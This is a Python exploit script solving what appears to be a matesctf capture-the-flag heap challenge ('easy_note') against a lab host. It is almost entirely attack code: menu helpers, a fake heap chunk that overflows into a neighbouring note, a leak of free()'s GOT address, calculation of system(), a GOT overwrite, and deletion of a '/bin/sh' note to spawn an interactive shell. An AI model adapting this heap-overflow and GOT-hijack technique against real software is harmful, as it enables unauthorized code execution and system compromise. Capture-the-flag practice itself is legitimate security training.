matesctf_easy_note_round1.py

#!/usr/bin/python

from Pwn import *

p = Pwn(mode=1,host='lab02.matesctf.org',port=4001)

def add_node(nid,content):
	p.read_until('Please choose an option :')
	p.write('1\n')
	p.read_until('Please give me an id:')
	p.write(nid + '\n')
	p.read_until('Please give me a size:')
	p.write(str(len(content)) + '\n')
	p.read_until('Please input your data:')
	p.send(content)
	p.write('\n')

def edit_node(nid,content):
	p.read_until('Please choose an option :')
	p.write('3\n')
	p.read_until('Please give me an id:')
	p.write(nid + '\n')
	p.read_until('Please give me a size:')
	p.write(str(len(content)) + '\n')
	p.send(content)
	p.write('\n')

def print_node(nid,size):
	p.read_until('Please choose an option :')
	p.write('4\n')
	p.read_until('Please give me an id:')
	p.write(nid + '\n')
	p.read_until('Please give me a size:')
	p.write(str(size) + '\n')

def delete(nid):
	p.read_until('Please choose an option :')
	p.write('2\n')
	p.read_until('Please give me an id:')
	p.write(nid + '\n')

def exploit():
	p.connect()

	# raw_input('> ')

	add_node('1'*15,'A'*16)
	add_node('2'*15,'/bin/sh\x00' + 'B'*8)
	add_node('3'*15,'C'*16)
	add_node('4'*15,'/bin/sh\x00' + 'B'*8)

	# print_node('1'*15,80)
	# heap_leak = p.recv(80)
	# heap_addr = p.up32(heap_leak[52:56])

	# print '[+] heap',hex(heap_addr)

	fake_chunk = 'A'*16 + p.pack(0) + p.pack(0x31)
	fake_chunk+= 'F'*15 + '\x00' + p.p32(0x10) + p.p32(0x602018)  # free got
	fake_chunk+= p.p32(0) + p.p32(0x41414141)

	delete('1'*15)
	edit_node('2'*15,fake_chunk) # heap overflow
	print_node('F'*15,8) # leak system

	leak = p.recv(8)
	free_addr = p.unpack(leak)
	system_addr = free_addr - p.get_libc_offset(free_addr,'free')

	print '[+] free()',hex(free_addr)
	print '[+] system()',hex(system_addr)

	edit_node('F'*15,p.pack(system_addr)) # overwrite got
	delete('4'*15) # trigger system

	p.io()

exploit()